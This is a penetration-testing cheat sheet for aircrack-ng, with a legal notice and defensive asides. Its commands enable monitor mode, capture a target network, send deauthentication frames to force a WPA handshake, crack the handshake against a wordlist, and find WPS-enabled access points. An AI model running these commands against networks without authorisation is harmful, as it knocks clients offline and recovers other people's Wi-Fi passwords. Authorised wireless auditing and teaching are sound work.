Aircracking
Legal Notice: Only use these tools on networks you own or have explicit written permission to test.
airmon-ng — Enable Monitor Mode
# List wireless interfaces, with the driver and chipset airmon-ng detects for each
airmon-ng
# Kill processes that can interfere with monitor mode (typically the network
# manager and wpa_supplicant). The host loses its normal network connectivity
# until those services are started again.
airmon-ng check kill
# Start monitor mode on wlan0
airmon-ng start wlan0
# Creates a monitor interface, wlan0mon (or similar); use the name airmon-ng reports
# Stop monitor mode and return the interface to managed mode
airmon-ng stop wlan0mon
airodump-ng — Capture Packets
# Scan all channels (hops between channels, listing the APs and clients seen)
airodump-ng wlan0mon
# Target a specific network (AA:BB:CC:DD:EE:FF is a placeholder BSSID)
airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w capture wlan0mon
# -c 6         stay on channel 6 instead of hopping
# --bssid      only capture traffic for this AP MAC address
# -w capture   output file prefix; airodump-ng appends a sequence number and
#              extension, so the file on disk is not literally "capture.cap"
# The capture holds client MAC addresses and handshake material: treat it as
# sensitive data.
aireplay-ng — Deauthentication Attack
# Deauth attack (forces clients to reconnect, triggering WPA handshake)
# The MAC addresses below are placeholders.
# Defensive note: 802.11w Protected Management Frames (mandatory in WPA3) make
# clients discard forged deauthentication frames, and a burst of deauth frames
# is a common wireless IDS detection signal.
aireplay-ng --deauth 10 -a AA:BB:CC:DD:EE:FF -c 11:22:33:44:55:66 wlan0mon
# --deauth 10   number of deauthentication bursts to send
# -a            AP BSSID
# -c            client MAC
aircrack-ng — Crack WPA Handshake
# Crack with wordlist
# -w   path to the wordlist of candidate passphrases
# -b   BSSID of the network whose handshake is tested (placeholder below)
# This is an offline dictionary test against the captured handshake: it only
# succeeds if the passphrase is in the wordlist. Long random passphrases resist
# it, and WPA3-SAE is designed to prevent offline dictionary attacks.
aircrack-ng -w /usr/share/wordlists/rockyou.txt -b AA:BB:CC:DD:EE:FF capture.cap
wash — Find WPS-Enabled Networks
# Install reaver (includes wash); requires root on Debian-based systems
apt install reaver
# Scan for WPS networks
# -i   monitor-mode interface to listen on
# The output reports whether WPS is enabled and locked on each AP. Disabling
# WPS on the access point removes the PIN-based weakness this audit looks for.
wash -i wlan0mon